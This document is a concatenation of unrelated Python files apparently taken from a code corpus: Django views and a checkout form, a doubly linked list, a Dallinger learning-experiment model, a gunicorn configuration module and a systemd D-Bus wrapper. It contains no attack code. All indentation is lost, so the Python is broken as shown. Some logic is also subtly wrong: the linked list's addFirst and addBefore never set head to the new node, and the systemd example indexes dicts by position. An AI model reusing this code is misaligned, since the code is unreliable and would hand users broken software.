send_mail(subject, message, from_email, ['[email protected]'])
except BadHeaderError:
return HttpResponse('Invalid header found.')
return redirect('success')
else:
form_class = ContactsModelForm
return render(request, "email.html", {'form': form})
def successView(request):
return HttpResponse('Success! Thank you for your message.')
#Added April 27
def dashboard(request):
return render(request, "dashboard.html")
def register(request):
if request.method == "GET":
return render(
request, "register.html",
{"form": CustomUserCreationForm}
)
elif request.method == "POST":
form = CustomUserCreationForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("dashboard")) |
py | b40b5db9ef4006aedb65589c680713bfd47b895a |
# Doubly linked List node class
class Node:
def __init__(self, value, nextNode, prevNode):
self.value = value
self.next = nextNode
self.prev = prevNode
# Doubly linked list implementation
class DoublyLinkedList:
def __init__(self):
self.size = 0
self.head = None
self.tail = None
def isEmpty(self):
return self.head is None
def contains(self, value):
if self.isEmpty():
return False
tmp = self.head
while tmp is not None:
if tmp.value == value:
return True
tmp = tmp.next
return False
def get(self, index):
if index > self.size and self.isEmpty():
raise IndexError
if index > self.size / 2:
index = (self.size - 1) - index
tmp = self.tail
while index > 0:
tmp = tmp.prev
index -= 1
return tmp.value
else:
tmp = self.head
while index > 0:
tmp = tmp.next
index -= 1
return tmp.value
# Python uses public variables so these aren't really necessary, but they
# are added for code consistency
def getFirst(self):
return self.head
def getLast(self):
return self.tail
def addLast(self, value):
if self.isEmpty():
tmp = Node(value, None, None)
self.head = tmp
self.tail = tmp
self.size += 1
return
tmp = self.tail
tmp.next = Node(value, None, tmp)
self.tail = tmp.next
self.size += 1
def addFirst(self, value):
if self.isEmpty():
tmp = Node(value, None, None)
self.head = tmp
self.tail = tmp
self.size += 1
return
tmp = self.head
tmp.prev = Node(value, tmp, None)
self.head = tmp
self.size += 1
def addAfter(self, key, toAdd):
if self.isEmpty():
raise IndexError
tmp = self.head
while tmp is not None:
if tmp.value == key:
newNode = Node(toAdd, tmp.next, tmp)
tmp.next = newNode
if(newNode.next is not None):
newNode.next.prev = newNode
else:
self.tail = newNode
self.size += 1
return
tmp = tmp.next
raise IndexError
def addBefore(self, key, toAdd):
if self.isEmpty():
raise IndexError
tmp = self.head
while tmp is not None:
if tmp.value == key:
newNode = Node(toAdd, tmp, tmp.prev)
tmp.prev = newNode
if newNode.prev is not None:
newNode.prev.next = newNode
else:
self.head = tmp
self.size += 1
return
tmp = tmp.next
raise IndexError
def remove(self, value):
if self.isEmpty():
return
tmp = self.head
while tmp is not None:
if tmp.value == value:
if tmp.prev is not None:
tmp.prev.next = tmp.next
else:
self.head = tmp.next
if tmp.next is not None:
tmp.next.prev = tmp.prev
else:
self.tail = tmp.prev
self.size -= 1
return
tmp = tmp.next
return
def removeFirst(self):
if self.isEmpty():
return
if self.size == 1:
self.head = None
self.tail = None
self.size -= 1
return
self.head = self.head.next
self.head.prev = None
self.size -= 1
def removeLast(self):
if self.isEmpty():
return
if self.size == 1:
self.head = None
self.tail = None
self.size -= 1
return
self.tail = self.tail.prev
self.tail.next = None
self.size -= 1
def indexOf(self, value):
index = 0
tmp = self.head
while tmp != None:
if tmp.value == value:
return index
tmp = tmp.next
index += 1
return -1
def clear(self):
self.size = 0
self.head = None
self.tail = None
def __str__(self):
res = "["
tmp = self.head
while tmp is not None:
res += str(tmp.value)
if tmp.next is not None:
res += ", "
tmp = tmp.next
res += "]"
return res
|
py | b40b5e6cc8014428d43475266ef5f7e4e6af555a | from operator import attrgetter
import random
from sqlalchemy import Float, Integer
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.sql.expression import cast
from dallinger.models import Transformation
from dallinger.information import Gene, Meme, State
from dallinger.nodes import Agent, Source
class LearningGene(Gene):
"""The Learning Gene."""
__mapper_args__ = {"polymorphic_identity": "learning_gene"}
def _mutated_contents(self):
# Toggle between the two possibilities
if self.contents == "social":
return "asocial"
else:
return "social"
class RogersSource(Source):
"""A source that initializes agents as asocial learners."""
__mapper_args__ = {"polymorphic_identity": "rogers_source"}
def _info_type(self):
"""Create a learning gene by default."""
return LearningGene
def _contents(self):
"""Contents of created Infos is 'asocial' by default."""
return "asocial"
def _what(self):
"""Transmit the first learning gene by default."""
return self.infos(type=LearningGene)[0]
class RogersAgent(Agent):
"""The Rogers Agent."""
__mapper_args__ = {"polymorphic_identity": "rogers_agent"}
@hybrid_property
def generation(self):
"""Convert property2 to genertion."""
return int(self.property2)
@generation.setter
def generation(self, generation):
"""Make generation settable."""
self.property2 = repr(generation)
@generation.expression
def generation(self):
"""Make generation queryable."""
return cast(self.property2, Integer)
@hybrid_property
def score(self):
"""Convert property3 to score."""
return int(self.property3)
@score.setter
def score(self, score):
"""Mark score settable."""
self.property3 = repr(score)
@score.expression
def score(self):
"""Make score queryable."""
return cast(self.property3, Integer)
@hybrid_property
def proportion(self):
"""Make property4 proportion."""
return float(self.property4)
@proportion.setter
def proportion(self, proportion):
"""Make proportion settable."""
self.property4 = repr(proportion)
@proportion.expression
def proportion(self):
"""Make proportion queryable."""
return cast(self.property4, Float)
def calculate_fitness(self):
"""Calculcate your fitness."""
if self.fitness is not None:
raise Exception(
"You are calculating the fitness of agent {}, ".format(self.id)
+ "but they already have a fitness"
)
said_blue = self.infos(type=Meme)[0].contents == "blue"
proportion = float(
max(
self.network.nodes(type=RogersEnvironment)[0].infos(),
key=attrgetter("id"),
).contents
)
self.proportion = proportion
is_blue = proportion > 0.5
if said_blue is is_blue:
self.score = 1
else:
self.score = 0
is_asocial = self.infos(type=LearningGene)[0].contents == "asocial"
e = 2
b = 1
c = 0.3 * b
baseline = c + 0.0001
self.fitness = (baseline + self.score * b - is_asocial * c) ** e
def update(self, infos):
"""Process received infos."""
genes = [i for i in infos if isinstance(i, LearningGene)]
for gene in genes:
if (
self.network.role == "experiment"
and self.generation > 0
and random.random() < 0.10
):
self.mutate(gene)
else:
self.replicate(gene)
def _what(self):
return self.infos(type=LearningGene)[0]
class RogersEnvironment(Source):
"""The Rogers environment."""
__mapper_args__ = {"polymorphic_identity": "rogers_environment"}
@hybrid_property
def proportion(self):
"""Convert property1 to propoertion."""
return float(self.property1)
@proportion.setter
def proportion(self, proportion):
"""Make proportion settable."""
self.property1 = repr(proportion)
@proportion.expression
def proportion(self):
"""Make proportion queryable."""
return cast(self.property1, Float)
def _info_type(self):
"""By default create States."""
return State
def _contents(self):
"""Contents of created infos is either propirtion or 1-proportion by default."""
if random.random() < 0.5:
return self.proportion
else:
return 1 - self.proportion
def _what(self):
"""By default transmit the most recent state """
return max(self.infos(type=State), key=attrgetter("id"))
def step(self):
"""Prompt the environment to change."""
current_state = max(self.infos(type=State), key=attrgetter("id"))
current_contents = float(current_state.contents)
new_contents = 1 - current_contents
info_out = State(origin=self, contents=new_contents)
Transformation(info_in=current_state, info_out=info_out)
|
py | b40b5edd4d2e69167813c0ec47968f8708edfef0 | # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import copy
import grp
import inspect
import optparse
import os
import pwd
import textwrap
import types
from gunicorn import __version__
from gunicorn.errors import ConfigError
from gunicorn import util
KNOWN_SETTINGS = []
def wrap_method(func):
def _wrapped(instance, *args, **kwargs):
return func(*args, **kwargs)
return _wrapped
def make_settings(ignore=None):
settings = {}
ignore = ignore or ()
for s in KNOWN_SETTINGS:
setting = s()
if setting.name in ignore:
continue
settings[setting.name] = setting.copy()
return settings
class Config(object):
def __init__(self, usage=None):
self.settings = make_settings()
self.usage = usage
def __getattr__(self, name):
if name not in self.settings:
raise AttributeError("No configuration setting for: %s" % name)
return self.settings[name].get()
def __setattr__(self, name, value):
if name != "settings" and name in self.settings:
raise AttributeError("Invalid access!")
super(Config, self).__setattr__(name, value)
def set(self, name, value):
if name not in self.settings:
raise AttributeError("No configuration setting for: %s" % name)
self.settings[name].set(value)
def parser(self):
kwargs = {
"usage": self.usage,
"version": __version__
}
parser = optparse.OptionParser(**kwargs)
keys = self.settings.keys()
def sorter(k):
return (self.settings[k].section, self.settings[k].order)
keys.sort(key=sorter)
for k in keys:
self.settings[k].add_option(parser)
return parser
@property
def worker_class(self):
uri = self.settings['worker_class'].get()
worker_class = util.load_class(uri)
if hasattr(worker_class, "setup"):
worker_class.setup()
return worker_class
@property
def workers(self):
return self.settings['workers'].get()
@property
def address(self):
bind = self.settings['bind'].get()
return util.parse_address(util.to_bytestring(bind))
@property
def uid(self):
return self.settings['user'].get()
@property
def gid(self):
return self.settings['group'].get()
@property
def proc_name(self):
pn = self.settings['proc_name'].get()
if pn is not None:
return pn
else:
return self.settings['default_proc_name'].get()
@property
def logger_class(self):
uri = self.settings['logger_class'].get()
logger_class = util.load_class(uri, default="simple",
section="gunicorn.loggers")
if hasattr(logger_class, "install"):
logger_class.install()
return logger_class
class SettingMeta(type):
def __new__(cls, name, bases, attrs):
super_new = super(SettingMeta, cls).__new__
parents = [b for b in bases if isinstance(b, SettingMeta)]
if not parents:
return super_new(cls, name, bases, attrs)
attrs["order"] = len(KNOWN_SETTINGS)
attrs["validator"] = wrap_method(attrs["validator"])
new_class = super_new(cls, name, bases, attrs)
new_class.fmt_desc(attrs.get("desc", ""))
KNOWN_SETTINGS.append(new_class)
return new_class
def fmt_desc(cls, desc):
desc = textwrap.dedent(desc).strip()
setattr(cls, "desc", desc)
setattr(cls, "short", desc.splitlines()[0])
class Setting(object):
__metaclass__ = SettingMeta
name = None
value = None
section = None
cli = None
validator = None
type = None
meta = None
action = None
default = None
short = None
desc = None
def __init__(self):
if self.default is not None:
self.set(self.default)
def add_option(self, parser):
if not self.cli:
return
args = tuple(self.cli)
kwargs = {
"dest": self.name,
"metavar": self.meta or None,
"action": self.action or "store",
"type": self.type or "string",
"default": None,
"help": "%s [%s]" % (self.short, self.default)
}
if kwargs["action"] != "store":
kwargs.pop("type")
parser.add_option(*args, **kwargs)
def copy(self):
return copy.copy(self)
def get(self):
return self.value
def set(self, val):
assert callable(self.validator), "Invalid validator: %s" % self.name
self.value = self.validator(val)
def validate_bool(val):
if isinstance(val, types.BooleanType):
return val
if not isinstance(val, basestring):
raise TypeError("Invalid type for casting: %s" % val)
if val.lower().strip() == "true":
return True
elif val.lower().strip() == "false":
return False
else:
raise ValueError("Invalid boolean: %s" % val)
def validate_dict(val):
if not isinstance(val, dict):
raise TypeError("Value is not a dictionary: %s " % val)
return val
def validate_pos_int(val):
if not isinstance(val, (types.IntType, types.LongType)):
val = int(val, 0)
else:
# Booleans are ints!
val = int(val)
if val < 0:
raise ValueError("Value must be positive: %s" % val)
return val
def validate_string(val):
if val is None:
return None
if not isinstance(val, basestring):
raise TypeError("Not a string: %s" % val)
return val.strip()
def validate_class(val):
if inspect.isfunction(val) or inspect.ismethod(val):
val = val()
if inspect.isclass(val):
return val
return validate_string(val)
def validate_callable(arity):
def _validate_callable(val):
if not callable(val):
raise TypeError("Value is not callable: %s" % val)
if arity != len(inspect.getargspec(val)[0]):
raise TypeError("Value must have an arity of: %s" % arity)
return val
return _validate_callable
def validate_user(val):
if val is None:
return os.geteuid()
if isinstance(val, int):
return val
elif val.isdigit():
return int(val)
else:
try:
return pwd.getpwnam(val).pw_uid
except KeyError:
raise ConfigError("No such user: '%s'" % val)
def validate_group(val):
if val is None:
return os.getegid()
if isinstance(val, int):
return val
elif val.isdigit():
return int(val)
else:
try:
return grp.getgrnam(val).gr_gid
except KeyError:
raise ConfigError("No such group: '%s'" % val)
def validate_post_request(val):
# decorator
def wrap_post_request(fun):
def _wrapped(instance, req, environ):
return fun(instance, req)
return _wrapped
if not callable(val):
raise TypeError("Value isn't a callable: %s" % val)
largs = len(inspect.getargspec(val)[0])
if largs == 3:
return val
elif largs == 2:
return wrap_post_request(val)
else:
raise TypeError("Value must have an arity of: 3")
class ConfigFile(Setting):
name = "config"
section = "Config File"
cli = ["-c", "--config"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
The path to a Gunicorn config file.
Only has an effect when specified on the command line or as part of an
application specific configuration.
"""
class Bind(Setting):
name = "bind"
section = "Server Socket"
cli = ["-b", "--bind"]
meta = "ADDRESS"
validator = validate_string
default = "127.0.0.1:8000"
desc = """\
The socket to bind.
A string of the form: 'HOST', 'HOST:PORT', 'unix:PATH'. An IP is a valid
HOST.
"""
class Backlog(Setting):
name = "backlog"
section = "Server Socket"
cli = ["--backlog"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 2048
desc = """\
The maximum number of pending connections.
This refers to the number of clients that can be waiting to be served.
Exceeding this number results in the client getting an error when
attempting to connect. It should only affect servers under significant
load.
Must be a positive integer. Generally set in the 64-2048 range.
"""
class Workers(Setting):
name = "workers"
section = "Worker Processes"
cli = ["-w", "--workers"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 1
desc = """\
The number of worker process for handling requests.
A positive integer generally in the 2-4 x $(NUM_CORES) range. You'll
want to vary this a bit to find the best for your particular
application's work load.
"""
class WorkerClass(Setting):
name = "worker_class"
section = "Worker Processes"
cli = ["-k", "--worker-class"]
meta = "STRING"
validator = validate_class
default = "sync"
desc = """\
The type of workers to use.
The default class (sync) should handle most 'normal' types of workloads.
You'll want to read http://gunicorn.org/design.html for information on
when you might want to choose one of the other worker classes.
A string referring to one of the following bundled classes:
* ``sync``
* ``eventlet`` - Requires eventlet >= 0.9.7
* ``gevent`` - Requires gevent >= 0.12.2 (?)
* ``tornado`` - Requires tornado >= 0.2
Optionally, you can provide your own worker by giving gunicorn a
python path to a subclass of gunicorn.workers.base.Worker. This
alternative syntax will load the gevent class:
``gunicorn.workers.ggevent.GeventWorker``. Alternatively the syntax
can also load the gevent class with ``egg:gunicorn#gevent``
"""
class WorkerConnections(Setting):
name = "worker_connections"
section = "Worker Processes"
cli = ["--worker-connections"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 1000
desc = """\
The maximum number of simultaneous clients.
This setting only affects the Eventlet and Gevent worker types.
"""
class MaxRequests(Setting):
name = "max_requests"
section = "Worker Processes"
cli = ["--max-requests"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 0
desc = """\
The maximum number of requests a worker will process before restarting.
Any value greater than zero will limit the number of requests a work
will process before automatically restarting. This is a simple method
to help limit the damage of memory leaks.
If this is set to zero (the default) then the automatic worker
restarts are disabled.
"""
class Timeout(Setting):
name = "timeout"
section = "Worker Processes"
cli = ["-t", "--timeout"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 30
desc = """\
Workers silent for more than this many seconds are killed and restarted.
Generally set to thirty seconds. Only set this noticeably higher if
you're sure of the repercussions for sync workers. For the non sync
workers it just means that the worker process is still communicating and
is not tied to the length of time required to handle a single request.
"""
class Keepalive(Setting):
name = "keepalive"
section = "Worker Processes"
cli = ["--keep-alive"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 2
desc = """\
The number of seconds to wait for requests on a Keep-Alive connection.
Generally set in the 1-5 seconds range.
"""
class LimitRequestLine(Setting):
name = "limit_request_line"
section = "Security"
cli = ["--limit-request-line"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 4094
desc = """\
The maximum size of HTTP request line in bytes.
This parameter is used to limit the allowed size of a client's
HTTP request-line. Since the request-line consists of the HTTP
method, URI, and protocol version, this directive places a
restriction on the length of a request-URI allowed for a request
on the server. A server needs this value to be large enough to
hold any of its resource names, including any information that
might be passed in the query part of a GET request. By default
this value is 4094 and can't be larger than 8190.
This parameter can be used to prevent any DDOS attack.
"""
class LimitRequestFields(Setting):
name = "limit_request_fields"
section = "Security"
cli = ["--limit-request-fields"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 100
desc= """\
Limit the number of HTTP headers fields in a request.
Value is a number from 0 (unlimited) to 32768. This parameter is
used to limit the number of headers in a request to prevent DDOS
attack. Used with the `limit_request_field_size` it allows more
safety.
"""
class LimitRequestFieldSize(Setting):
name = "limit_request_field_size"
section = "Security"
cli = ["--limit-request-field_size"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 8190
desc= """\
Limit the allowed size of an HTTP request header field.
Value is a number from 0 (unlimited) to 8190. to set the limit
on the allowed size of an HTTP request header field.
"""
class Debug(Setting):
name = "debug"
section = "Debugging"
cli = ["--debug"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Turn on debugging in the server.
This limits the number of worker processes to 1 and changes some error
handling that's sent to clients.
"""
class Spew(Setting):
name = "spew"
section = "Debugging"
cli = ["--spew"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Install a trace function that spews every line executed by the server.
This is the nuclear option.
"""
class ConfigCheck(Setting):
name = "check_config"
section = "Debugging"
cli = ["--check-config",]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Check the configuration..
"""
class PreloadApp(Setting):
name = "preload_app"
section = "Server Mechanics"
cli = ["--preload"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Load application code before the worker processes are forked.
By preloading an application you can save some RAM resources as well as
speed up server boot times. Although, if you defer application loading
to each worker process, you can reload your application code easily by
restarting workers.
"""
class Daemon(Setting):
name = "daemon"
section = "Server Mechanics"
cli = ["-D", "--daemon"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Daemonize the Gunicorn process.
Detaches the server from the controlling terminal and enters the
background.
"""
class Pidfile(Setting):
name = "pidfile"
section = "Server Mechanics"
cli = ["-p", "--pid"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
A filename to use for the PID file.
If not set, no PID file will be written.
"""
class User(Setting):
name = "user"
section = "Server Mechanics"
cli = ["-u", "--user"]
meta = "USER"
validator = validate_user
default = os.geteuid()
desc = """\
Switch worker processes to run as this user.
A valid user id (as an integer) or the name of a user that can be
retrieved with a call to pwd.getpwnam(value) or None to not change
the worker process user.
"""
class Group(Setting):
name = "group"
section = "Server Mechanics"
cli = ["-g", "--group"]
meta = "GROUP"
validator = validate_group
default = os.getegid()
desc = """\
Switch worker process to run as this group.
A valid group id (as an integer) or the name of a user that can be
retrieved with a call to pwd.getgrnam(value) or None to not change
the worker processes group.
"""
class Umask(Setting):
name = "umask"
section = "Server Mechanics"
cli = ["-m", "--umask"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 0
desc = """\
A bit mask for the file mode on files written by Gunicorn.
Note that this affects unix socket permissions.
A valid value for the os.umask(mode) call or a string compatible with
int(value, 0) (0 means Python guesses the base, so values like "0",
"0xFF", "0022" are valid for decimal, hex, and octal representations)
"""
class TmpUploadDir(Setting):
name = "tmp_upload_dir"
section = "Server Mechanics"
meta = "DIR"
validator = validate_string
default = None
desc = """\
Directory to store temporary request data as they are read.
This may disappear in the near future.
This path should be writable by the process permissions set for Gunicorn
workers. If not specified, Gunicorn will choose a system generated
temporary directory.
"""
class SecureSchemeHeader(Setting):
name = "secure_scheme_headers"
section = "Server Mechanics"
validator = validate_dict
default = {
"X-FORWARDED-PROTOCOL": "ssl",
"X-FORWARDED-SSL": "on"
}
desc = """\
A dictionary containing headers and values that the front-end proxy
uses to indicate HTTPS requests. These tell gunicorn to set
wsgi.url_scheme to "https", so your application can tell that the
request is secure.
The dictionary should map upper-case header names to exact string
values. The value comparisons are case-sensitive, unlike the header
names, so make sure they're exactly what your front-end proxy sends
when handling HTTPS requests.
It is important that your front-end proxy configuration ensures that
the headers defined here can not be passed directly from the client.
"""
class XForwardedFor(Setting):
name = "x_forwarded_for_header"
section = "Server Mechanics"
meta = "STRING"
validator = validate_string
default = 'X-FORWARDED-FOR'
desc = """\
Set the X-Forwarded-For header that identify the originating IP
address of the client connection to gunicorn via a proxy.
"""
class AccessLog(Setting):
name = "accesslog"
section = "Logging"
cli = ["--access-logfile"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
The Access log file to write to.
"-" means log to stderr.
"""
class AccessLogFormat(Setting):
name = "access_log_format"
section = "Logging"
cli = ["--access-logformat"]
meta = "STRING"
validator = validate_string
default = '"%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"'
desc = """\
The Access log format .
By default:
%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"
h: remote address
l: '-'
u: currently '-', may be user name in future releases
t: date of the request
r: status line (ex: GET / HTTP/1.1)
s: status
b: response length or '-'
f: referer
a: user agent
T: request time in seconds
D: request time in microseconds,
p: process ID
{Header}i: request header
{Header}o: response header
"""
class ErrorLog(Setting):
name = "errorlog"
section = "Logging"
cli = ["--error-logfile", "--log-file"]
meta = "FILE"
validator = validate_string
default = "-"
desc = """\
The Error log file to write to.
"-" means log to stderr.
"""
class Loglevel(Setting):
name = "loglevel"
section = "Logging"
cli = ["--log-level"]
meta = "LEVEL"
validator = validate_string
default = "info"
desc = """\
The granularity of Error log outputs.
Valid level names are:
* debug
* info
* warning
* error
* critical
"""
class LoggerClass(Setting):
name = "logger_class"
section = "Logging"
cli = ["--logger-class"]
meta = "STRING"
validator = validate_class
default = "simple"
desc = """\
The logger you want to use to log events in gunicorn.
The default class (``gunicorn.glogging.Logger``) handle most of
normal usages in logging. It provides error and access logging.
You can provide your own worker by giving gunicorn a
python path to a subclass like gunicorn.glogging.Logger.
Alternatively the syntax can also load the Logger class
with `egg:gunicorn#simple`
"""
class LogConfig(Setting):
name = "logconfig"
section = "Logging"
cli = ["--log-config"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
The log config file to use.
Gunicorn uses the standard Python logging module's Configuration
file format.
"""
class Procname(Setting):
name = "proc_name"
section = "Process Naming"
cli = ["-n", "--name"]
meta = "STRING"
validator = validate_string
default = None
desc = """\
A base to use with setproctitle for process naming.
This affects things like ``ps`` and ``top``. If you're going to be
running more than one instance of Gunicorn you'll probably want to set a
name to tell them apart. This requires that you install the setproctitle
module.
It defaults to 'gunicorn'.
"""
class DefaultProcName(Setting):
name = "default_proc_name"
section = "Process Naming"
validator = validate_string
default = "gunicorn"
desc = """\
Internal setting that is adjusted for each type of application.
"""
class DjangoSettings(Setting):
name = "django_settings"
section = "Django"
cli = ["--settings"]
meta = "STRING"
validator = validate_string
default = None
desc = """\
The Python path to a Django settings module.
e.g. 'myproject.settings.main'. If this isn't provided, the
DJANGO_SETTINGS_MODULE environment variable will be used.
"""
class DjangoPythonPath(Setting):
name = "pythonpath"
section = "Django"
cli = ["--pythonpath"]
meta = "STRING"
validator = validate_string
default = None
desc = """\
A directory to add to the Python path for Django.
e.g.
'/home/djangoprojects/myproject'.
"""
class OnStarting(Setting):
name = "on_starting"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def on_starting(server):
pass
default = staticmethod(on_starting)
desc = """\
Called just before the master process is initialized.
The callable needs to accept a single instance variable for the Arbiter.
"""
class OnReload(Setting):
name = "on_reload"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def on_reload(server):
for i in range(server.app.cfg.workers):
server.spawn_worker()
default = staticmethod(on_reload)
desc = """\
Called to recycle workers during a reload via SIGHUP.
The callable needs to accept a single instance variable for the Arbiter.
"""
class WhenReady(Setting):
name = "when_ready"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def when_ready(server):
pass
default = staticmethod(when_ready)
desc = """\
Called just after the server is started.
The callable needs to accept a single instance variable for the Arbiter.
"""
class Prefork(Setting):
name = "pre_fork"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def pre_fork(server, worker):
pass
default = staticmethod(pre_fork)
desc = """\
Called just before a worker is forked.
The callable needs to accept two instance variables for the Arbiter and
new Worker.
"""
class Postfork(Setting):
name = "post_fork"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def post_fork(server, worker):
pass
default = staticmethod(post_fork)
desc = """\
Called just after a worker has been forked.
The callable needs to accept two instance variables for the Arbiter and
new Worker.
"""
class PreExec(Setting):
name = "pre_exec"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def pre_exec(server):
pass
default = staticmethod(pre_exec)
desc = """\
Called just before a new master process is forked.
The callable needs to accept a single instance variable for the Arbiter.
"""
class PreRequest(Setting):
name = "pre_request"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def pre_request(worker, req):
worker.log.debug("%s %s" % (req.method, req.path))
default = staticmethod(pre_request)
desc = """\
Called just before a worker processes the request.
The callable needs to accept two instance variables for the Worker and
the Request.
"""
class PostRequest(Setting):
name = "post_request"
section = "Server Hooks"
validator = validate_post_request
type = "callable"
def post_request(worker, req, environ):
pass
default = staticmethod(post_request)
desc = """\
Called after a worker processes the request.
The callable needs to accept two instance variables for the Worker and
the Request.
"""
class WorkerExit(Setting):
name = "worker_exit"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def worker_exit(server, worker):
pass
default = staticmethod(worker_exit)
desc = """\
Called just after a worker has been exited.
The callable needs to accept two instance variables for the Arbiter and
the just-exited Worker.
"""
|
py | b40b5f9c24d913ddf6d66abdfd3f4caf71223bd8 | # Written by Aleksandr Aleksandrov <[email protected]>
#
# Copyright (c) 2016, Emlid Limited
# All rights reserved.
#
# Redistribution and use in source and binary forms,
# with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import dbus
UNIT_INTERFACE = "org.freedesktop.systemd1.Unit"
SERVICE_UNIT_INTERFACE = "org.freedesktop.systemd1.Service"
class SystemdManager(object):
def __init__(self):
self.__bus = dbus.SystemBus()
def list_units(self):
return [
dict(zip([
'unit_name',
'description',
'load_state',
'active_state',
'sub_state',
'follower',
'unit_object_path',
'job_id',
'job_type',
'job_object_path'
], unit))
for unit in self._interface().ListUnits()
]
def list_jobs(self):
return [
dict(zip([
'job_id',
'unit_name',
'job_type',
'job_state',
'job_object_path',
'unit_object_path'
], job))
for job in self._interface().ListJobs()
]
def start_unit(self, unit_name, mode="replace"):
self._interface().StartUnit(unit_name, mode)
return True
def stop_unit(self, unit_name, mode="replace"):
self._interface().StopUnit(unit_name, mode)
return True
def restart_unit(self, unit_name, mode="replace"):
self._interface().RestartUnit(unit_name, mode)
return True
def enable_unit(self, unit_name):
self._interface().EnableUnitFiles(
[unit_name],
dbus.Boolean(False),
dbus.Boolean(True)
)
return True
def disable_unit(self, unit_name):
self._interface().DisableUnitFiles([unit_name], dbus.Boolean(False))
return True
def get_active_state(self, unit_name):
properties = self._get_unit_properties(unit_name, UNIT_INTERFACE)
if properties is None:
return False
return properties["ActiveState"].encode("utf-8") if "ActiveState" in properties else False
def is_active(self, unit_name):
return self.get_active_state(unit_name) == b"active"
def is_failed(self, unit_name):
return self.get_active_state(unit_name) == b"failed"
def get_error_code(self, unit_name):
service_properties = self._get_unit_properties(unit_name, SERVICE_UNIT_INTERFACE)
if service_properties is None:
return None
return self._get_exec_status(service_properties)
def _get_exec_status(self, properties):
return int(properties["ExecMainStatus"]) if "ExecMainStatus" in properties else None
def _get_result(self, properties):
return properties["Result"].encode("utf-8") if "Result" in properties else None
def _get_unit_properties(self, unit_name, unit_interface):
unit_path = self._interface().LoadUnit(unit_name)
obj = self.__bus.get_object("org.freedesktop.systemd1", unit_path)
properties_interface = dbus.Interface(obj, "org.freedesktop.DBus.Properties")
return properties_interface.GetAll(unit_interface)
def _get_unit_file_state(self, unit_name):
return self._interface().GetUnitFileState(unit_name)
def _interface(self):
obj = self.__bus.get_object("org.freedesktop.systemd1", "/org/freedesktop/systemd1")
return dbus.Interface(obj, "org.freedesktop.systemd1.Manager")
if __name__ == "__main__":
s = SystemdManager()
try:
for u in s.list_units():
if u[0].endswith('.service'):
print(u[0])
except dbus.exceptions.DBusException as error:
print(error)
|
py | b40b60503970ec6e87242086033604e9fd70d12d | from django import forms
from checkout.models import Checkout
from django.utils.translation import gettext_lazy as _
class CheckoutForm(forms.ModelForm):
class Meta:
model = Checkout
fields = (
'title',
'enter',
'phone_number',
'company',
'country',
'state',
'city',
'address',
)
widgets = {
'title': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Your name')
}),
'enter': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Enter your here')
}),
'phone_number': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Phone here')
}),
'company': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Company name here...')
}),
'country': forms.Select(attrs={
'class': 'form-control',
'placeholder': _('Country')
}),
'state': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('State')
}),
'city': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Town/City')
}),
'address': forms.Textarea(attrs={
'class': 'form-control',
'placeholder': _('Your address here'),
'cols': 50
}),
} |
Subsets and Splits
